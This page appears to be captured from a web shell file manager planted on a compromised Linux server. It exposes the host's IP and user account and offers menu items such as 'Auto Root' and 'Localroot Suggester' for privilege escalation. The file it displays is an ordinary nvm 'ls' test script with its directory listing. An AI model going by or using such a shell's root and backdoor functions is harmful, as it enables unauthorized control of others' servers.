Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
.nvm /
test /
fast /
Listing versions /
Delete
Unzip
Name
Size
Permission
Date
Action
Running 'nvm ls --no-alias' does not call into nvm_alias
896
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls --no-alias' with a pattern errors
500
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls 0.0.2' should display only version 0.0.2
411
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls 0.2' should display only 0.2.x versions
861
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls foo' should return a nonzero exit code when not found
73
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls io' should return NA
56
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls node_' should return a nonzero exit code when not found
59
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls stable' and 'nvm ls unstable' should return the appropriate implicit alias
902
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls system' should include 'system' when appropriate
558
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' calls into nvm_alias
890
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' should display all installed versions
1.24
KB
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' should filter out '.nvm'
192
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' should filter out 'versions'
199
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' should include 'system' when appropriate
530
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' should list versions in the 'versions' directory
320
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' should not show a trailing slash
819
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' with node-like versioning vx.x.x should only list a matched version
188
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm ls' with nounset should not fail
622
B
-rwxrwxr-x
2025-06-22 16:20
Using a nonstandard IFS should not break
297
B
-rwxrwxr-x
2025-06-22 16:20
teardown
384
B
-rwxrwxr-x
2025-06-22 16:20
Save
Rename
#!/bin/sh \. ../../../nvm.sh \. ../../common.sh die () { echo "$@" ; unset -f nvm_ls nvm_list_aliases; exit 1; } set -e OUTPUT="$(nvm ls --no-colors --no-alias pattern 2>&1 ||:)" EXPECTED_OUTPUT='`--no-alias` is not supported when a pattern is provided.' EXIT_CODE="$(nvm ls --no-colors --no-alias pattern >/dev/null 2>&1 || echo $?)" [ "${OUTPUT}" = "${EXPECTED_OUTPUT}" ] || die "expected >${EXPECTED_OUTPUT}<; got >${OUTPUT}<" [ "${EXIT_CODE}" = 55 ] || die "expected 55; got >${EXIT_CODE}<"